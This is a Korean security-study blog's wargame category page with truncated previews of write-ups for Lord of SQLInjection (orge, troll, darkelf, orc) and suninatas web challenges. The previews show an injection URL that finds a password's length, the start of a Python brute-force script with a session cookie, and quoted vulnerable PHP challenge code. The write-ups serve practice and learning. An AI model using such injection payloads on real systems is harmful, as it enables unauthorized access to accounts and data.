보안공부/워게임
보안공부/워게임
lordofsql: orge,troll
길이를 알아내자 https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw='||length(pw)='8 글자 부분은 문자열로 처리하는 것을 잊지 말자 8글자이다. 서연님 코드 💖 import string from requests import get cookies = dict(PHPSESSID="p24meiam9jk50qesefn9judace") url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" abc = string.digits + string.ascii_letters result = 'result : ' length = 8 for i in r..
보안공부/워게임
Lord of SQLInjection- darkelf
include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); //막아놓음 if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); //or과 and 안된다. $query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; echo "query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "..
보안공부/워게임
suninatas -web 1,2,3,4,5
문제 풀고 AUTH창에 푼 키를 적으면 된다. 1. ami ami aadmin 이므로 admin 입력 결과 나온다. mid 이거 다시 보기 https://www.oppadu.com/%EC%97%91%EC%85%80-mid-%ED%95%A8%EC%88%98/ 엑셀 MID 함수 사용법 및 실전예제 :: 텍스트 함수 - 오빠두엑셀 엑셀 MID 함수 요약 선택한 문자열의 지정한 위치부터 원하는 문자수만큼 문자열을 반환합니다. 설명 MID 함수는 선택된 문자열 또는 셀에 포함된 문자열에서 사용자가 지정한 위치로부터 지정한 www.oppadu.com mid에서 = MID ( 추출할_문자열, 시작위치, 추출할_문자수 ) 시작위치는 1부터 시작 aadmin 이렇게 추출된다. &는 문자열 이어주는 함수 https://v..
보안공부/워게임
LordofSQLInjection 4,5
include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; echo "query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello admin"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from..
